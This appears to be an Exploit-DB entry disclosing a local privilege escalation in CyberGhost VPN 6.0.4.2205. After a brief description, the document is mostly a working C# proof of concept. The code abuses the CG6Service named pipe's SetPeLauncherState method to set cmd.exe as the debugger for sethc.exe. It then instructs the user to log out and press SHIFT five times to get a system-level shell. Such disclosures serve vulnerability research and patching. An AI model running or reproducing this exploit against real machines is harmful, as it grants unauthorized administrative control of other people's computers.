Exploit CyberGhost 6.0.4.2205 Privilege Escalation

vendor:

CyberGhost

by:

Kacper Szurek

N/A

CVSS

N/A

Privilege Escalation

CWE

Product Name: CyberGhost

Affected Version From: 6.0.4.2205

Affected Version To: 6.0.4.2205

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2017

Exploit CyberGhost 6.0.4.2205 Privilege Escalation

`CG6Service` service has method `SetPeLauncherState` which allows launch the debugger automatically for every process we want.

Mitigation:

Source

Exploit-DB raw data:

# Exploit CyberGhost 6.0.4.2205 Privilege Escalation
# Date: 06.03.2017
# Software Link: http://www.cyberghostvpn.com/
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: local
  
1. Description
 
`CG6Service` service has method `SetPeLauncherState` which allows launch the debugger automatically for every process we want.

https://security.szurek.pl/cyberghost-6042205-privilege-escalation.html

2. Proof of Concept

using System;
using CyberGhost.Communication;

namespace cyber
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("CyberGhost 6.0.4.2205 Privilege Escalation");
            Console.WriteLine("by Kacper Szurek");
            Console.WriteLine("http://security.szurek.pl/");
            Console.WriteLine("https://twitter.com/KacperSzurek");
            PeLauncherOptions options = new PeLauncherOptions();
            options.ExecuteableName = "sethc.exe";
            options.PeLauncherExecuteable = @"c:\Windows\System32\cmd.exe";
            EventSender CyberGhostCom = CyberGhostCom = new EventSender("CyherGhostPipe");
            CyberGhostCom.SetPeLauncherState(options, PeLauncherOperation.Add);
            Console.WriteLine("Now logout and then press SHIFT key 5 times");
        }
    }
}